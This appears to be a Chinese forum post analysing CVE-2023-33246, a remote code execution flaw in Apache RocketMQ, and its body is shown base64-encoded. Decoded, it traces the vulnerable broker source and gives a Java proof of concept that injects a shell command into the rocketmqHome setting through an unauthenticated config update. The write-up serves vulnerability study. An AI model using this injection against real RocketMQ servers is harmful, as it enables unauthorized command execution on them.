CVE-2023-33246 RocketMQ 远程代码执行漏洞
IyDkuIDjgIHmvI/mtJ7mj4/ov7AKClJvY2tldE1RIDUuMS4w5Y+K5Lul5LiL54mI5pys77yM5Zyo5LiA5a6a5p2h5Lu25LiL77yM5a2Y5Zyo6L+c56iL5ZG95Luk5omn6KGM6aOO6Zmp44CCUm9ja2V0TVHnmoROYW1lU2VydmVy44CBQnJva2Vy44CBQ29udHJvbGxlcuetieWkmuS4que7hOS7tuWklue9keazhOmcsu+8jOe8uuS5j+adg+mZkOmqjOivge+8jOaUu+WHu+iAheWPr+S7peWIqeeUqOivpea8j+a0nuWIqeeUqOabtOaWsOmFjee9ruWKn+iDveS7pVJvY2tldE1R6L+Q6KGM55qE57O757uf55So5oi36Lqr5Lu95omn6KGM5ZG95Luk44CCIOatpOWklu+8jOaUu+WHu+iAheWPr+S7pemAmui/h+S8qumAoCBSb2NrZXRNUSDljY/orq7lhoXlrrnmnaXovr7liLDlkIzmoLfnmoTmlYjmnpzjgIIKCiMg5LqM44CB5b2x5ZON54mI5pysCgpBcGFjaGUgUm9ja2V0TVEgPD0gNS4xLjEgQXBhY2hlIFJvY2tldE1RIDw9IDQuOS42CgpgYGAKdGhpcy5icm9rZXJDb25maWcuaXNFbmFibGVTbGF2ZUFjdGluZ01hc3RlcigpIHx8IHRoaXMuYnJva2VyQ29uZmlnLmlzRW5hYmxlQ29udHJvbGxlck1vZGUoKSkgewogICAgICAgIGlzSXNvbGF0ZWQgPSB0cnVlOwogICAgfQogICAgaWYgKHRoaXMuYnJva2VyT3V0ZXJBUEkgIT0gbnVsbCkgewogICAgICAgIHRoaXMuYnJva2VyT3V0ZXJBUEkuc3RhcnQoKTsKICAgIH0KCS8v6LCD55So6Iezc3RhcnRCYXNpY1NlcnZpY2UoKQogICAgc3RhcnRCYXNpY1NlcnZpY2UoKTsKCiAgICBpZiAoIWlzSXNvbGF0ZWQgJiYgIXRoaXMubWVzc2FnZVN0b3JlQ29uZmlnLmlzRW5hYmxlRExlZ2VyQ29tbWl0TG9nKCkgJiYgIXRoaXMubWVzc2FnZVN0b3JlQ29uZmlnLmlzRHVwbGljYXRpb25FbmFibGUoKSkgewogICAgICAgIGNoYW5nZVNwZWNpYWxTZXJ2aWNlU3RhdHVzKHRoaXMuYnJva2VyQ29uZmlnLmdldEJyb2tlcklkKCkgPT0gTWl4QWxsLk1BU1RFUl9JRCk7CiAgICAgICAgdGhpcy5yZWdpc3RlckJyb2tlckFsbCh0cnVlLCBmYWxzZSwgdHJ1ZSk7CiAgICB9CgkuLi4uCmBgYAoKQnJva2VyQ29udHJvbGxlciNzdGFydEJhc2ljU2VydmljZSgpCgpgYGBqYXZhCnByb3RlY3RlZCB2b2lkIHN0YXJ0QmFzaWNTZXJ2aWNlKCkgdGhyb3dzIEV4Y2VwdGlvbiB7CgkuLi4KICAgIGlmICh0aGlzLmZpbHRlclNlcnZlck1hbmFnZXIgIT0gbnVsbCkgewogICAgICAgIC8v6LCD55So6IezRmlsdGVyU2VydmVyTWFuYWdlciNzdGFydCgpCiAgICAgICAgdGhpcy5maWx0ZXJTZXJ2ZXJNYW5hZ2VyLnN0YXJ0KCk7CiAgICB9CiAgICBpZiAodGhpcy5icm9rZXJTdGF0c01hbmFnZXIgIT0gbnVsbCkgewogICAgICAgIHRoaXMuYnJva2VyU3RhdHNNYW5hZ2VyLnN0YXJ0KCk7CiAgICB9CgkuLi4uCmBgYAoKRmlsdGVyU2VydmVyTWFuYWdlciNzdGFydCgpCgpgYGBqYXZhCnB1YmxpYyB2b2lkIHN0YXJ0KCkgewoJLy/lrprml7blkajmnJ/miafooYzmjIflrprku7vliqEKICAgIC8v5Lu75Yqh77yaRmlsdGVyU2VydmVyTWFuYWdlci50aGlzLmNyZWF0ZUZpbHRlclNlcnZlcigpOwogICAgLy/liJ3lp4vljJblu7bml7Y6MTAwMCAqIDUKICAgIC8v5Lik5qyh5byA5aeL5omn6KGM5pyA5bCP6Ze06ZqU5pe26Ze0OjEwMDAgKiAzMAogICAgLy/orqHml7bljZXkvY3vvJpUaW1lVW5pdC5NSUxMSVNFQ09ORFMg5q+r56eSCiAgICB0aGlzLnNjaGVkdWxlZEV4ZWN1dG9yU2VydmljZS5zY2hlZHVsZUF0Rml4ZWRSYXRlKG5ldyBBYnN0cmFjdEJyb2tlclJ1bm5hYmxlKGJyb2tlckNvbnRyb2xsZXIuZ2V0QnJva2VyQ29uZmlnKCkpIHsKICAgICAgICA8c3BhbiBjbGFzcz0ibGFiZWwgbGFiZWwtcHJpbWFyeSI+QE92ZXJyaWRlI0NUTHtufTwvc3Bhbj4gICAgICAgIHB1YmxpYyB2b2lkIHJ1bjAoKSB7CiAgICAgICAgICAgIHRyeSB7CiAgICAgICAgICAgICAgICBGaWx0ZXJTZXJ2ZXJNYW5hZ2VyLnRoaXMuY3JlYXRlRmlsdGVyU2VydmVyKCk7CiAgICAgICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgICAgICBsb2cuZXJyb3IoIiIsIGUpOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfSwgMTAwMCAqIDUsIDEwMDAgKiAzMCwgVGltZVVuaXQuTUlMTElTRUNPTkRTKTsKfQpwdWJsaWMgdm9pZCBjcmVhdGVGaWx0ZXJTZXJ2ZXIoKSB7CiAgICAvL2ZpbHRlclNlcnZlck51bXPpu5jorqTkuLowCiAgICAvL2ZpbHRlclNlcnZlclRhYmxlLnNpemUoKSDpu5jorqTkuLowCiAgICAvL21vcmUg6buY6K6k5Li6MAogICAgaW50IG1vcmUgPQogICAgICAgIHRoaXMuYnJva2VyQ29udHJvbGxlci5nZXRCcm9rZXJDb25maWcoKS5nZXRGaWx0ZXJTZXJ2ZXJOdW1zKCkgLSB0aGlzLmZpbHRlclNlcnZlclRhYmxlLnNpemUoKTsKICAgIC8v6I635Y+WY21kLOatpOWkhGNtZCDpg6jliIblj6/mjqcKICAgIFN0cmluZyBjbWQgPSB0aGlzLmJ1aWxkU3RhcnRDb21tYW5kKCk7CiAgICAvL21vcmUg6buY6K6k5Li6MOS4jei/m+WFpeW+queOr++8jOiLpeimgeaJp+ihjGNtZCAg5YiZbW9yZSDkuI3kuLow77yM5Y2z6YCa6L+H6YWN572u5L+u5pS55L2/ZmlsdGVyU2VydmVyTnVtc+S4jeS4ujAKICAgIGZvciAoaW50IGkgPSAwOyBpICBPSyIsIHNoZWxsU3RyaW5nKTsKICAgICAgICB9IGNhdGNoIChUaHJvd2FibGUgZSkgewogICAgICAgICAgICBsb2cuZXJyb3IoIkNhbGxTaGVsbDogcmVhZExpbmUgSU9FeGNlcHRpb24sIHt9Iiwgc2hlbGxTdHJpbmcsIGUpOwogICAgICAgIH0gZmluYWxseSB7CiAgICAgICAgICAgIGlmIChudWxsICE9IHByb2Nlc3MpCiAgICAgICAgICAgICAgICBwcm9jZXNzLmRlc3Ryb3koKTsKICAgICAgICB9CiAgICB9CiAgICBwcml2YXRlIHN0YXRpYyBTdHJpbmdbXSBzcGxpdFNoZWxsU3RyaW5nKGZpbmFsIFN0cmluZyBzaGVsbFN0cmluZykgewogICAgICAgIHJldHVybiBzaGVsbFN0cmluZy5zcGxpdCgiICIpOwogICAgfQp9CmBgYAoKIyMgMuOAgea8j+a0nuWIqeeUqAoK57u85LiK77yaCjHjgIHns7vnu5/pu5jorqQzMOenkuaJp+ihjOS4gOasoSBgRmlsdGVyU2VydmVyTWFuYWdlciNjcmVhdGVGaWx0ZXJTZXJ2ZXIoKWAKMuOAgWBGaWx0ZXJTZXJ2ZXJNYW5hZ2VyI2NyZWF0ZUZpbHRlclNlcnZlcigpYOS4reWtmOWcqOWRveS7pOaJp+ihjOihjOS4ugoz44CB5Y+v6YCa6L+H5pyq5o6I5p2D5L+u5pS56YWN572u5o6n5Yi26KaB5omn6KGM55qE5ZG95LukLOWIhuS4uuS7peS4i+S4pOenjeaDheWGtToKd2luZG93c++8mmBzdGFydCAvYiAkezF9XFxiaW5cXG1xZmlsdGVyc3J2LmV4ZSAtYyAkezJ9IC1uICR7M31gCumdnndpbmRvd3M6YCBzaCAkezF9L2Jpbi9zdGFydGZzcnYuc2ggLWMgJHsyfSAtbiAkezN9YAox44CBMuOAgTPkuInlh7rlnYflj6/pgJrov4fphY3nva7mlofku7bmjqfliLbjgIIKCiMjIyBwYXlsb2FkCgpgYGBqYXZhCmltcG9ydCBqYXZhLnV0aWwuUHJvcGVydGllczsKaW1wb3J0IG9yZy5hcGFjaGUucm9ja2V0bXEudG9vbHMuYWRtaW4uRGVmYXVsdE1RQWRtaW5FeHQ7CgpwdWJsaWMgc3RhdGljIHZvaWQgbWFpbihTdHJpbmdbXSBhcmdzKSB7CiAgICAgICAgLy8g5Yib5bu6IFByb3BlcnRpZXMg5a+56LGhCiAgICAgICAgUHJvcGVydGllcyBwcm9wcyA9IG5ldyBQcm9wZXJ0aWVzKCk7CiAgICAgICAgLy/kv67mlLlyb2NrZXRtcUhvbWXphY3nva4KICAgICAgICBwcm9wcy5zZXRQcm9wZXJ0eSgicm9ja2V0bXFIb21lIiwiLWMgJEB8c2ggLiBlY2hvIG9wZW4gLWEgQ2FsY3VsYXRvcjsiKTsKICAgICAgICBwcm9wcy5zZXRQcm9wZXJ0eSgiZmlsdGVyU2VydmVyTnVtcyIsIjEiKTsKICAgICAgICAvLyDliJvlu7ogRGVmYXVsdE1RQWRtaW5FeHQg5a+56LGh5bm25ZCv5YqoCiAgICAgICAgRGVmYXVsdE1RQWRtaW5FeHQgYWRtaW4gPSBuZXcgRGVmYXVsdE1RQWRtaW5FeHQoKTsKICAgICAgICAvL+atpOWkhOS4uiBuYW1lc3J2IOerr+WPoyzmraTnq6/lj6Pml6DpnIDlj6/orr/pl64KICAgICAgICBhZG1pbi5zZXROYW1lc3J2QWRkcigibG9jYWxob3N0Ojk4NzYiKTsKICAgICAgICBhZG1pbi5zdGFydCgpOwogICAgICAgIC8vIOabtOaWsOmFjee9ruK9guS7tgogICAgICAgIC8v5q2k5aSE5Li6IGJyb2tlciDnq6/lj6PvvIzlv4Xpobvlj6/orr/pl64KICAgICAgICBhZG1pbi51cGRhdGVCcm9rZXJDb25maWcoIjEyNy4wLjAuMToxMDkxMSIsIHByb3BzKTsKICAgICAgICAvLyDlhbPpl60gRGVmYXVsdE1RQWRtaW5FeHQg5a+56LGhCiAgICAgICAgYWRtaW4uc2h1dGRvd24oKTsKfQpgYGA=
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| Track-魔方 | 300.00 | 0 | 2023-06-05 11:11:49 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
0 条回复
|
直到 2023-6-2 |
722 次浏览
登录后才可发表内容
返回:技术文章投稿区
漏洞文章
